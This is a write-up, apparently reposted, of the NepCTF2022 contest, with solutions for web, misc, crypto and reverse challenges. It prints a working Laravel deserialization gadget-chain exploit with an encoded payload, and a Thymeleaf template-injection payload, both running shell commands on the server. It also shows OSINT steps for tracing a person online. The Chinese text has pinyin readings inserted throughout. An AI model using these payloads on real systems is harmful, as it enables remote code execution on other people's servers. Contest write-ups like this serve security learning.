[CTF]-NepCTF2022

• web
• • Just Kidding
  • Challenger
• Misc
• • 簽到
  • 花花畫(huà)畫(huà)畫(huà)花花
  • 餡餅？陷阱！
  • 9點(diǎn)直播
  • 少見(jiàn)的base
  • 原來(lái)你也玩智能家居
  • DoubleHappiness
• Crypto
• • sinin
  • 中學(xué)數(shù)學(xué)
• Re
• • 簽到

---

web

Just Kidding

掃目錄有 www.zip

下載得到源碼 代碼審計(jì)

//App\Http\Controllers\HelloController.phpclass HelloController extends Controller {public function hello(\Illuminate\Http\Request $request){$h3 = base64_decode($request->input("h3"));unserialize($h3);return "Welcome Nepctf! GL&HF";}}

發(fā)現(xiàn)這個(gè) php 文件中有一個(gè)反序列化的函數(shù)，存在反序列化漏洞

查找 __destruct() 方法
跟進(jìn) src/Illuminate/Broadcasting/PendingBroadcast.php 中的 __destruct 方法, 可以看到這里的 $this->events 和 $this->event 均為可控的, 尋找可用的 dispatch 方法

... public function __destruct(){$this->events->dispatch($this->event);}

這里跟進(jìn) src/Illuminate/Bus/Dispatcher.php 中的 dispatch 方法, 這里的 $command 和 $this->queueResolver 均是可控的.

跟進(jìn) dispatchToQueue 方法, $command 和 $this->queueResolver 均是可控的,

不難看出可以利用該方法中的 call_user_func 方法來(lái)進(jìn)行命令執(zhí)行的利用.

現(xiàn)在需要解決的就是命令執(zhí)行的語(yǔ)句, 注意到上圖中的代碼 $connection = $command->connection ?? null;

這里可以通過(guò) src/Illuminate/Broadcasting/BroadcastEvent.php 中的類(lèi)中變量來(lái)控制 $connection

從而達(dá)到命令執(zhí)行的目的.

//exp: <?php namespace Illuminate\Contracts\Queue{interface ShouldQueue {} } namespace Illuminate\Bus{class Dispatcher{protected $container;protected $pipeline;protected $pipes = [];protected $handlers = [];protected $queueResolver;function __construct(){$this->queueResolver = "system";}} } namespace Illuminate\Broadcasting{use Illuminate\Contracts\Queue\ShouldQueue;class BroadcastEvent implements ShouldQueue {function __construct() {}}class PendingBroadcast{protected $events;protected $event;function __construct() {$this->event = new BroadcastEvent();$this->event->connection = "cat /flag";$this->events = new \Illuminate\Bus\Dispatcher();}} } namespace {$pop = new \Illuminate\Broadcasting\PendingBroadcast();echo base64_encode(serialize($pop)); }

payload

/hello?h3=Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MjU6IklsbHVtaW5hdGVcQnVzXERpc3BhdGNoZXIiOjU6e3M6MTI6IgAqAGNvbnRhaW5lciI7TjtzOjExOiIAKgBwaXBlbGluZSI7TjtzOjg6IgAqAHBpcGVzIjthOjA6e31zOjExOiIAKgBoYW5kbGVycyI7YTowOnt9czoxNjoiACoAcXVldWVSZXNvbHZlciI7czo2OiJzeXN0ZW0iO31zOjg6IgAqAGV2ZW50IjtPOjM4OiJJbGx1bWluYXRlXEJyb2FkY2FzdGluZ1xCcm9hZGNhc3RFdmVudCI6MTp7czoxMDoiY29ubmVjdGlvbiI7czo5OiJjYXQgL2ZsYWciO319

---

Challenger

代碼審計(jì)

//關(guān)鍵代碼@GetMapping({"/eval"}) public String path(@RequestParam String lang) {return "user/" + lang + "/welcome"; }

利用 Thymeleaf 模板注入

訪問(wèn) /eval 目錄

需要 lang 參數(shù)

/eval?lang=.....

然后找到 payload

?lang=__$%7bnew%20java.util.Scanner(T(java.lang.Runtime).getRuntime().exec(%22cat /flag%22).getInputStream()).next()%7d__::.x

---

Misc

簽到

套娃 230 多層

┌──(root?kali)-[/home/muz1/桌面] └─# binwalk xxx.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01 33877 0x8455 Zip archive data, at least v1.0 to extract, compressed size: 77532, uncompressed size: 77532, name: 232.zip 111452 0x1B35C End of Zip archive, footer length: 22 111709 0x1B45D End of Zip archive, footer length: 22 ┌──(root?kali)-[/home/muz1/桌面] └─# foremost xxx.jpg Processing: xxx.jpg |foundat=232.zipUT foundat=繼續(xù)解壓呀 UT *|

偽加密 ， 改字段值

解壓出一個(gè)流量包

然后用 tshark 提取

tshark.exe -r .\keyboard.pcap -T fields -e usb.capdata > usbdata.txt 0000110000000000 0000000000000000 0000080000000000 0000000000000000 0000130000000000 0000000000000000 0000060000000000 0000000000000000 0000170000000000 0000000000000000 0000090000000000 0000000000000000 0200000000000000 02002f0000000000 0200000000000000 0000000000000000 00001a0000000000 00001a0800000000 0000080000000000 0000000000000000 00000f0000000000 0000000000000000 0000060000000000 0000000000000000 0000120000000000 0000121000000000 0000100000000000 0000000000000000 0000080000000000 0000000000000000 2000000000000000 20002d0000000000 0000000000000000 0000170000000000 0000120000000000 0000000000000000 2000000000000000 20002d0000000000 0000000000000000 0000110000000000 0000000000000000 0000080000000000 0000000000000000 0000130000000000 0000000000000000 0000060000000000 0000000000000000 0000170000000000 0000000000000000 0000090000000000 0000000000000000 2000000000000000 20002d0000000000 0000000000000000 00001f0000000000 0000000000000000 0000110000000000 0000000000000000 0000070000000000 0000000000000000 0200000000000000 0200300000000000 0200000000000000 0000000000000000 0000280000000000 0000000000000000

轉(zhuǎn)一下格式

f = open('data.txt', 'r', encoding='utf-16') fi = open('out.txt', 'w', encoding='utf-16') while 1:a = f.readline().strip()if a:if len(a) == 16: # 鼠標(biāo)流量的話 len 改為 8out = ''for i in range(0, len(a), 2):if i + 2 != len(a):out += a[i] + a[i + 1] + ":"else:out += a[i] + a[i + 1]fi.write(out)fi.write('\n')else:breakfi.close()

然后提取關(guān)鍵信息

normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e","09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j","0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o","13":"p", "14":"q", "15":"r", "16":"s", "17":"t","18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y","1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4","22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"} shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E","09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J","0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O","13":"P", "14":"Q", "15":"R", "16":"S", "17":"T","18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y","1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$","22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"\t","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>"} output = [] keys = open('out.txt','r',encoding='utf-16') for line in keys:try:if line[0]!='0' or (line[1]!='0' and line[1]!='2') or line[3]!='0' or line[4]!='0' or line[9]!='0' or line[10]!='0' or line[12]!='0' or line[13]!='0' or line[15]!='0' or line[16]!='0' or line[18]!='0' or line[19]!='0' or line[21]!='0' or line[22]!='0' or line[6:8]=="00":continueif line[6:8] in normalKeys.keys():output += [[normalKeys[line[6:8]]],[shiftKeys[line[6:8]]]][line[1]=='2']else:output += ['[unknown]']except:pass keys.close() flag=0 print("".join(output)) for i in range(len(output)):try:a=output.index('<DEL>')del output[a]del output[a-1]except:pass for i in range(len(output)):try:if output[i]=="<CAP>":flag+=1output.pop(i)if flag==2:flag=0if flag!=0:output[i]=output[i].upper()except:pass print ('output :' + "".join(output)) output :nepctf{welcometonepctf2nd}<RET>nepctf{welcome_to_nepctf_2nd}

---

花花畫(huà)畫(huà)畫(huà)花花

osu 文件推測(cè)為音游 osu

安裝后將該文件夾放入到歌曲目錄即可進(jìn)行挑戰(zhàn)或編輯

NepCTF{MASTER_OF_壞女人！}

---

餡餅？陷阱！

瓊 -> 海南

谷歌地圖 定位海南

搜索如家酒店

中國(guó)光大銀行NepCTF{www.cebbank.com}

---

9點(diǎn)直播

直播間福利

---

少見(jiàn)的base

010查看 沒(méi)東西

binwalk沒(méi)東西

┌──(root?kali)-[~/桌面] └─# binwalk bbbbase.jpg DECIMAL HEXADECIMAL DESCRIPTION -------------------------------------------------------------------------------- 0 0x0 JPEG image data, JFIF standard 1.01

嘗試到了 Jphswin

選擇文件 --> seek --> 無(wú)密碼 --> 保存文件

010打開(kāi) --> 解碼

flag{Real_qiandao~}

---

原來(lái)你也玩智能家居

admin / admin 登錄

首頁(yè)看見(jiàn)切換按鈕

這里就可以利用MQTT的通配符特性來(lái)捕獲cmnd下所有的數(shù)據(jù)，即cmnd/#

點(diǎn)擊切換按鈕

---

DoubleHappiness

用 Honeyview 打開(kāi)

點(diǎn)擊GPS

查找附近的門(mén)店
找到附近的瑞星咖啡店為瑞幸咖啡(蓮花商務(wù)中心店)

上美團(tuán)外賣(mài)APP上找到這家店鋪，查看評(píng)論區(qū)中日期為7月13日的評(píng)論

微博搜索 Tr0jAn-

果然沒(méi)錯(cuò)，就是這小子。可以看到最新的一條微博發(fā)了一張寶石山俯瞰西湖夜景圖，在圖片右下角水印處有馬賽克，隱隱約約可以看出有NepCTF字樣。

可以把這個(gè)馬賽克先摳出來(lái)

再使用unRedacter工具來(lái)破解，需要注意的是，摳出來(lái)的馬賽克要調(diào)整一下比例(304x40)，還要在字典里添加大寫(xiě)英文字母、數(shù)字以及下劃線

NepCTF{ti_0d_nAj0r}

---

Crypto

sinin

yafu分解 N

P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901 P309 = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891

得到 p 和 q， 然后和 c_mod_q c_mod_p 一起運(yùn)算得到c

# 求兩個(gè)數(shù)的最大公約數(shù)gcd函數(shù) def gcd(a, b):if b == 0:return aelse:return gcd(b, a % b)# 判斷一個(gè)列表任意兩個(gè)數(shù)是否兩兩互質(zhì)def compare(list):for i in range(0, len(list)):flag = 1for j in range(i + 1, len(list)):if gcd(list[i], list[j]) != 1:print('不能直接使用中國(guó)剩余定理！')exit()# 如果滿(mǎn)足條件，就會(huì)繼續(xù)執(zhí)行，否則退出程序# 求出輸入的m1,m2,..,mk 的乘積m def product_m(list):m = 1for i in list:m *= ireturn m# 求M1,M2,..,MK 的值 Mj = m / mj 并返回一個(gè)名為shang的列表 def get_divsion(list, m):div = []for i in list:div.append(m // i)return divdef get_inverse(a, m): # 求一個(gè)數(shù)a 的逆 再模m 的值 這個(gè)函數(shù)返回的是一個(gè)值不是列表if gcd(a, m) != 1:return Noneu1, u2, u3 = 1, 0, av1, v2, v3 = 0, 1, mwhile v3 != 0:q = u3 // v3v1, v2, v3, u1, u2, u3 = (u1 - q * v1), (u2 - q * v2), (u3 - q * v3), v1, v2, v3return u1 % m# 求Xj 算法為：Xj = (M * M_INVERSE * a) % mj def get_x(M: int, M_inverse: int, a: int, m: int):product_x = (M * M_inverse * a) % mreturn product_x# 算出最終答案X = X1+X2+...Xk def get_solution(list_m, list_a):# compare(list_m)m = product_m(list_m)list_M = get_divsion(list_m, m)list_M_inverse = []list_X = []total = 0for i in range(0, len(list_M)):list_M_inverse.append(get_inverse(list_M[i], list_m[i]))for i in range(len(list_M)):list_X.append(get_x(list_M[i], list_M_inverse[i], list_a[i], m))for x in list_X:total += xreturn total % m # 測(cè)試數(shù)據(jù) list_m = [141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901,141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891] list_a = [32087476819370469840242617415402189007173583393431940289526096277088796498999849060235750455260897143027010566292541554247738211165214410052782944239055659645055068913404216441100218886028415095562520911677409842046139862877354601487378542714918065194110094824176055917454013488494374453496445104680546085816,59525076096565721328350936302014853798695106815890830036017737946936659488345231377005951566231961079087016626410792549096788255680730275579842963019533111895111371299157077454009624496993522735647049730706272867590368692485377454608513865895352910757518148630781337674813729235453169946609851250274688614922] print(get_solution(list_m, list_a))# 調(diào)用get_solution()函數(shù)即可使用中國(guó)剩余定理 # get_solution()函數(shù)要傳入得是兩個(gè)列表list_a,list_m # 讀取與輸入list_a,list_m;并將其變?yōu)檎偷臄?shù)據(jù)在

帶入之后得到c ， 然后繼續(xù)代碼

from Crypto.Util.number import long_to_bytes def fast_power(base, power, MOD):result = 1while power > 0:# If power is oddif power % 2 == 1:result = (result * base) % MOD# Divide the power by 2power = power // 2# Multiply base to itselfbase = (base * base) % MODreturn result def gcd(a, b):while a != 0:a, b = b % a, areturn b # calc : b^(-1) mod m def findModeInverse(b, m, show=True):if gcd(m, b) != 1:return NoneA1, A2, A3 = 1, 0, mB1, B2, B3 = 0, 1, bif show:print('-' * 54)print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("Q", "A1", "A2", "A3", "B1", "B2", "B3"))print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format("-", A1, A2, A3, B1, B2, B3))while True:Q = A3 // B3B1, B2, B3, A1, A2, A3 = (A1 - Q * B1), (A2 - Q * B2), (A3 - Q * B3), B1, B2, B3if show:print("|{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}\t{:^5}|".format(Q, A1, A2, A3, B1, B2, B3))if B3 == 0:return Noneelif B3 == 1:breakif show:print("-" * 54)return B2 % m p = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202901 q = 141264221379693044160345378758459195879285464451894666001807667429134348549398732060237738374405784248735752195059908618618110595213605790125890251970818437656069617772772793421437649079362238861287098916200835889507111259332056471215428085418047179545017193159169629731673653136069647622114441162534727202891 d = 1252990107815050396131095071106875863839625463162341861437776714252424196867083751438050781152678454544290561348477588314424473974689219719915628330383292496262245806653795391680166551537602119522395725446199697857165189662727850129646294082998077471030893379415607095699225984851603694723276083262879311002929800558428024700747018831268269585502183294987547669372754175415834581968714034535861714455512875208618004858007748676310828573704007774858023825900743373244384093983022857223181677619286464710238287796148593564498619278346936626883260434122906742989245858429095035901635408963549294384055658232382801968473 c = 11585753035364453623378164545833713948934121662572481093551492504984285077422719062455876099192809170965528989978916297975142142402092047776685650391890015591851053625214326683661927557815767412532952834312578481775648269348260126890551800182341487341482624921905494384205411870866282984671167687789838745481283560185866063970417999748309023918055613674098243729965218609202078551918246640314724590879724609275497227193516782920583249761139685192331805838597293957173545581106446048233248746840771791319643962479707861560044363232580020690857525268858245122996322707454824806268698526881569554077998480289824923073346 dp = d % (p-1) dq = d % (q-1) Cp = c % p Cq = c % q a = findModeInverse(q, p, False) # q對(duì)p的逆元 : 114 Mp = fast_power(Cp, dp, p) # 102 Mq = fast_power(Cq, dq, q) # 120 b = (a * ((Mp - Mq) % p)) % p c = Mq + b*q print("CRT的解密結(jié)果：", c) print(long_to_bytes(c)) NepCTF{ju5t_d0_f4ct_4nd_crt_th3n_d3crypt}

---

中學(xué)數(shù)學(xué)

from gmpy2 import * # from Crypto.Util.number import * from Crypto import * from secret import *p = getPrime(1024) q = next_prime(p + (p >> 500)) e = 0x10001 n = p * q c = pow(bytes_to_long(flag), e, n) print("n=", n) print("c=", c)''' n= 13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507c= 6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186 '''

根據(jù)代碼知道 p 和 q 很接近，但是用了腳本之后并不出
還有費(fèi)馬定理的 p 和 q 很接近
找個(gè)費(fèi)馬定理的腳本

from Crypto.Util.number import long_to_bytes from gmpy2 import gmpy2c=6253975396639688013947622483271226838902346034187241970785550830715516801386404802832796746428068354515287579293520381463797045055114065533348514688044281004266071342722261719304097175009672596062130939189624163728328429608123325223000160428261082507446604698345173189268359115612698883860396660563679801383563588818099088505120717238037463747828729693649297904035253985982099474025883550074375828799938384533606092448272306356003096283602697757642323962299153853559914553690456801745940925602411053578841756504799815771173679267389055390097241148454899265156705442028845650177138185876173539754631720573266723359186 n=13776679754786305830793674359562910178503525293501875259698297791987196248336062506951151345232816992904634767521007443634017633687862289928715870204388479258679577315915061740028494078672493226329115247979108035669870651598111762906959057540508657823948600824548819666985698501483261504641066030188603032714383272686110228221709062681957025702835354151145335986966796484545336983392388743498515384930244837403932600464428196236533563039992819408281355416477094656741439388971695931526610641826910750926961557362454734732247864647404836037293509009829775634926600458845832805085222154851310850740227722601054242115507 e = 0x10001def factor(n):a = gmpy2.iroot(n, 2)[0]while 1:B2 = pow(a, 2) - nif gmpy2.is_square(B2):b = gmpy2.iroot(B2, 2)[0]p = a + bq = a - breturn p, qa += 1 # 千萬(wàn)別忘了a的自增步長(zhǎng)為1p, q = factor(n) f = (p - 1) * (q - 1) d = gmpy2.invert(e, f) print(long_to_bytes(pow(c, d, n)))# b'flag{never_ignore_basic_math}'

---

Re

簽到

ida 打開(kāi)修復(fù)報(bào)錯(cuò)（改cfg文件 和 將圖形化設(shè)置修改一下）

左下角就是 flag

---

總結(jié)

以上是生活随笔為你收集整理的[CTF]-NepCTF2022的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。